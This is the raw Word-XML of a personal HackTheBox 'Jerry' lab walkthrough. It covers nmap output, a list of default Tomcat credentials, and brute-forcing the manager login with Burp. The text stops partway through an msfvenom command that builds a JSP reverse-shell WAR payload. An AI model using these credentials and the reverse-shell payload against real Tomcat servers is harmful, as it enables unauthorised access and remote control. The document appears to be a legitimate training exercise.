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CC432" w14:textId="686A2B56" w:rsidR="008C2AD2" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0004673D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HackTheBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0004673D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Jerry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D6ED0" w14:textId="1493502B" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Session: 10.10.10.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72773D90" w14:textId="3BA68F8D" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>I opened my terminal and ran:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E16EB9" w14:textId="66C9E660" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -T4 -p- -A 10.10.10.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A97DEA5" w14:textId="3FC61F0B" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="0004673D">
      <w:r>
        <w:t>Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6192CA" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t xml:space="preserve">Starting Nmap 7.70 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( https://nmap.org</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ) at 2020-11-10 16:08 EST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13491239" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Nmap scan report for 10.10.10.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CC914" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Host is up (0.10s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB0332" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Not shown: 65534 filtered ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1046639E" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77685EB1" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>8080/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http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A059246" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>|_http-favicon: Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C98FE0" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>|_http-server-header: Apache-Coyote/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1555F" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>|_http-title: Apache Tomcat/7.0.88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5504EA" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r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</w:p>
    <w:p w14:paraId="51AA51F5" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1712C0" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Running (JUST GUESSING): Microsoft Windows 2012|2008|7|Vista (91%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26371510" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_server_2012:r2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_server_2008:r2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_7::-:professional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_8 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:microsoft:windows_vista</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">::- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:microsoft:windows_vista</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::sp1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FBAF7" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 7 Professional (85%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04245965" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>No exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01862BFF" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Network Distance: 2 hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135280E0" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D"/>
    <w:p w14:paraId="5F26BD6F" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>TRACEROUTE (using port 8080/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E292B" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>HOP RTT       ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE570D" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t xml:space="preserve">1   103.00 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.10.14.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1E4E16" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2   103.05 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.10.10.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A67CF5" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D"/>
    <w:p w14:paraId="2B148A1D" w14:textId="77777777" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D"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14:paraId="5A23E656" w14:textId="2EA1C96E" w:rsidR="0004673D" w:rsidRDefault="0004673D" w:rsidP="0004673D">
      <w:r>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 157.39 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602ACB9F" w14:textId="42059C47" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="0004673D">
      <w:r>
        <w:t xml:space="preserve">I noticed there is only one port shown that is vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C492116" w14:textId="1C7F2FC5" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="0004673D">
      <w:r>
        <w:t>So, I went to the website 10.10.10.95:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1735B8" w14:textId="4D5C73FE" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="0004673D">
      <w:r w:rsidRPr="00302197">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EDAB544" wp14:editId="3388A719">
            <wp:extent cx="5943600" cy="447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DF73" w14:textId="77777777" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t>8080/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http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2243B" w14:textId="77777777" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t>|_http-favicon: Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4C306" w14:textId="77777777" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t>|_http-server-header: Apache-Coyote/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2F3E7" w14:textId="48F1B61D" w:rsidR="0004673D" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t>|_http-title: Apache Tomcat/7.0.88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE45FE2" w14:textId="3C196AAA" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">This from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is what I will be targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C7724" w14:textId="0960DE37" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">I googled: tomcat default credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64398E8A" w14:textId="4140CB5B" w:rsidR="00302197" w:rsidRDefault="00302197" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">I found a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with tomcat default credentials list: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1539"/>
      </w:tblGrid>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="4F0E1BBB" w14:textId="77777777" w:rsidTr="00542DC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59D1D" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRPr="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00542D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92D5E" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRPr="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00542DC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Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="46F41625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AB1B1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admin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FCE8F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password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="254DABDD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26D40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admin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5E1A2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542DC8" w:rsidRPr="00542DC8" w14:paraId="5B44BD5D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716FA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admin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94410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Password1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="0E0B0B07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18D09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admin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C782C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password1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="6DBF47F7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2B341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admin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3A8CB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admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="72D05031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8AEDD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admin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92FEC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tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="2108E78D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15160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both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BA72B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tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="16D5E3B5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7D846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0DD47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manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="1AB83B71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D5459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role1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999A6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role1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="6DB449FE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D1221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role1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D38AE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tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="30086A3D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78CDC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role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3A9DD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changethis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="51A2E0B5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06FAA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root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8ADDE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Password1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="2D1D7B7A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36F65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root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56841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changethis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="186BE4B4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6C671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root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7D610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password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="48D45457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18C67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root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44267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password1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="0E3B8A20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46F2A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root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964C3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r00t</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="66F85CE8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E95B7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root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247C7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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="3CCA784C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11249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root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76AD6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toor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="512D9481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5CC4F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tomcat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BBE3A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tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="7FA121E1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7061B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tomcat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23392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s3cret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="27F76649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DBDA1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tomcat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0C44C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password1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="69029CA2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BCDB8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tomcat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FE576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password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="10D5B577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FD89B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tomcat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57F69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542DC8" w:rsidRPr="00542DC8" w14:paraId="4F8FFF24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F534B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tomcat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B65E0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admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="4FB43200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BEDD4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tomcat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FD17B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542DC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changethis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00542DC8" w:rsidRPr="00542DC8" w14:paraId="1ACDA176" w14:textId="77777777" w:rsidTr="00542D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F23DAF" w14:textId="5C3A2371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3560C2" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRPr="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00542DC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14:paraId="6DC63693" w14:textId="14CC41D1" w:rsidR="00302197" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">I then created a tomcat.txt file storing all those credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05A013" w14:textId="0B2ECA04" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">However, I had to edit the txt to read base 64 so I had to make all credentials ex = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tomcat:tomcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40EA1572" w14:textId="489513AA" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t>To prove the credentials were Base64, I ran Burp Suite and intercepted the log in for the manager App and got:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A202AF1" w14:textId="57D32A4C" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r w:rsidRPr="00542DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7660E5E5" wp14:editId="7E6084CA">
            <wp:extent cx="5792008" cy="154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9B9F" w14:textId="0F9E7940" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00542DC8">
        <w:t>dG9tY2F0OnMzY3JldA==</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is base 64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E3B14" w14:textId="46759DAE" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I opened my terminal to run a bash script to change all the credentials above to base 64 encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F0915" w14:textId="20A4F5DA" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r w:rsidRPr="00542DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F012317" wp14:editId="60510E78">
            <wp:extent cx="5943600" cy="145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6104" w14:textId="0DDCEFE5" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r w:rsidRPr="00542DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4688C8B8" wp14:editId="08891450">
            <wp:extent cx="3562847" cy="3448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EBD2" w14:textId="4A784759" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The 25 credentials are now base 64 and now I can brute force using the sniper option in Burp Suite </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03560D88" w14:textId="19A33F3D" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r w:rsidRPr="00542DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72964263" wp14:editId="159BEB6C">
            <wp:extent cx="5943600" cy="3023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D90F" w14:textId="0C7827EA" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00542DC8">
        <w:t>dG9tY2F0OnMzY3JldA==</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> length is the largest of the 25 and the status 200: OK means that is our password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055AD73F" w14:textId="63F83F84" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">I went to decoder in Burp Suite and found my password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9A862" w14:textId="618A199D" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r w:rsidRPr="00542DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F689189" wp14:editId="39A3F210">
            <wp:extent cx="5391902" cy="1276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9905" w14:textId="5593312A" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">Now with that, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275989D7" w14:textId="3CEA1DF2" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We are logge</w:t>
      </w:r>
      <w:r w:rsidR="00DC4E1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>d in:</w:t>
      </w:r>
      <w:r w:rsidRPr="00542DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F2EC7A5" wp14:editId="6C347D51">
            <wp:extent cx="5943600" cy="4988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04C2" w14:textId="415D8E55" w:rsidR="00542DC8" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">There is a war file upload and that is where we can run our exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A32DD" w14:textId="4F71F8CD" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r w:rsidRPr="00DC4E1F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0092E982" wp14:editId="76A267B8">
            <wp:extent cx="59436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AD28" w14:textId="1624F798" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">Next, I googled: tomcat war file reverse exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFECD7" w14:textId="05940BFB" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t>I found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3640C" w14:textId="77777777" w:rsidR="00DC4E1F" w:rsidRPr="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00DC4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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC4E1F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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660033"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F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java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC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DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsp_shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC4E1F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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC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DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Your IP Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC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C4E1F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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC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DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Your Port to Connect On</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC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C4E1F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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660033"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4E1F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war </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC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C4E1F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</w:t>
      </w:r>
